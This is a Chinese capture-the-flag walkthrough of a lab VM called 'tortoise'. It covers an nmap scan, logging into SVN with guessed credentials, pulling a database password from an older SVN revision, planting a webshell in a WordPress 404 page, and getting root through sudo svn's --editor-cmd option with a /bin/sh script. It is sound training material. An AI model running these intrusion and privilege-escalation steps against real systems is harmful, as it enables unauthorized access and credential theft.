当前位置: 首页 > news >正文

群友靶机tortoise wp - 场

nmap -p- 192.168.10.5
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-30 04:52 EST
Nmap scan report for tortoise.dsz (192.168.10.5)
Host is up (0.00073s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3690/tcp open  svn
MAC Address: 08:00:27:D5:23:F7 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

添加一下域名,80端口是个WordPress。

感觉突破口在SVN服务上。但是需要得到用户名和密码。然后翻翻文章。http://tortoise.dsz/2026/01/23/a-comprehensive-guide-to-subversion-svn在这里面发现了用户名和密码的设计方式。发现有harry:harryssecret另外一个sally的密码设计也是同理。

svn list -R svn://192.168.10.5/ --username harry --password harryssecret
config.php
svn cat svn://192.168.10.5/config.php --username harry --password harryssecret                  
db_user=getenv('DB_USER');\ndb_pass=getenv('DB_PASS');

发现没有什么有用信息。接下来考虑上传webshell。然后发现不可行。然后看看日志,发现了admin的密码

┌──(kali㉿kali)-[~/Desktop]
└─$ svn log -v svn://192.168.10.5/ --username harry --password harryssecret       
------------------------------------------------------------------------
r2 | root | 2026-01-23 07:13:55 -0500 (Fri, 23 Jan 2026) | 1 line
Changed paths:M /config.phpRemove hardcoded credentials for security
------------------------------------------------------------------------
r1 | root | 2026-01-23 07:13:54 -0500 (Fri, 23 Jan 2026) | 1 line
Changed paths:A /config.phpInitialize database config
------------------------------------------------------------------------                                                      
┌──(kali㉿kali)-[~/Desktop]
└─$ svn cat -r 1 svn://192.168.10.5/config.php --username harry --password harryssecret
db_user='admin'\ndb_pass='S3cret_P@ss_2026'

接下来就是打WordPress了,404页面写马,蚁剑连。

/var/www/localhost/.backup.php中发现define('SECURE_KEY', '1006b3921');猜测是用户密码,果真。

发现可以SVN提权。

                                         
Tortoise:~$ sudo -l
[sudo] password for onehang: 
Matching Defaults entries for onehang on Tortoise:secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binRunas and Command-specific defaults for onehang:Defaults!/usr/sbin/visudo env_keep+="SUDO_EDITOR EDITOR VISUAL"User onehang may run the following commands on Tortoise:(ALL : ALL) /usr/bin/svn
Tortoise:~$ cd /tmp
Tortoise:/tmp$ vim exploit.sh 
Tortoise:/tmp$ cat exploit.sh 
#!/bin/sh
/bin/sh
Tortoise:/tmp$ chmod +x exploit.sh 
Tortoise:/tmp$ sudo /usr/bin/svn commit --editor-cmd /tmp/exploit.sh
/tmp # id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
/tmp # cat /root/root.txt
flag{root-0b09d631dfda5e9d87a422fc17c1e286}
http://www.jsqmd.com/news/330221/

相关文章:

  • 热销榜单:2026年高口碑图文活码推荐,助你实现二维码信息快速共享
  • 2026年1月品质产品排行,奥古拉及联系方式,环保瓷砖胶/门前柱子/荔枝面罗马柱/仿古窗套线,奥古拉厂家有哪些
  • 【Linux】进程概念(五):详解环境变量的本质
  • 电子学会青少年软件编程(C语言)等级考试试卷(五级)2025年12月
  • 掌握Java网页抓取:技巧与示例完整指南
  • 时序数据库选型操作:Apache IoTDB 的深度实战应用
  • 考虑多智能体在B端落地前企业自身需考虑管理文化的“AI化”
  • 网络 UDP 和 TCP / IP详细介绍
  • 2025年阿胶糕品牌实力排行榜,拼多多口碑厂家揭晓,膏方类产品/阿胶类产品/阿胶糕/阿胶/阿胶类/膏方阿胶糕代工厂怎么选择
  • SSA优化LSSVM做回归预测,即麻雀搜索算法优化最小二乘支持向量机做预测,预测精度高于LSSVM
  • Linux 命令行参数与环境变量实战:从基础用法到底层原理
  • 【C / C++】带你系统的认识 string
  • 导师推荐8个降AIGC工具,千笔AI助你轻松降AI率
  • 一篇搞定全流程,AI论文网站 千笔·专业论文写作工具 VS 灵感风暴AI
  • 真的太省时间了!AI论文软件 千笔AI VS PaperRed,自考写作神器!
  • 2026年行业内有实力的截止阀生产厂家怎么选择,气动闸阀/电动调节阀/刀闸阀/蝶式止回阀/电动盲板阀,截止阀厂商联系电话
  • labview通过以太网基于s7协议,读写西门子系列plc1500 plc1200 plc40...
  • WINCC报表(7.0-7.5),画面自动全屏轮播是全屏哦,WEB发布网页可浏览(需安装web...
  • 2026年市面上好用的暖风机生产厂家推荐,蒸汽暖风机/热水暖风机/换热器/吊顶空调机组/制热机组,暖风机供应商联系电话
  • DSP28035串口升级方案:含BootLoader、测试App及上位机源码,CCS10.3...
  • 小红的好排列【牛客tracker 每日一题】
  • 多模态RAG不是“加个图”那么简单:从解析到生成的全流程拆解
  • 洛谷 P2480 [SDOI2010] 古代猪文 题解
  • 百度智能云边缘云服务器,端云协同赋能全域智能场景
  • AI中国故事加篇-对话董仲舒—天人感应与AI伦理:大一统、教化系统与责任框架
  • ue metahuman 头发更换实战
  • 四大厂商云服务器安全创新对比,筑牢数字化转型安全底座
  • 主流中石化加油卡回收方式
  • No141:AI世间故事-对话黑格尔——辩证法与AI演化:绝对精神、否定之否定与历史理性
  • TRAE提示词技巧完全指南:6大场景助你高效开发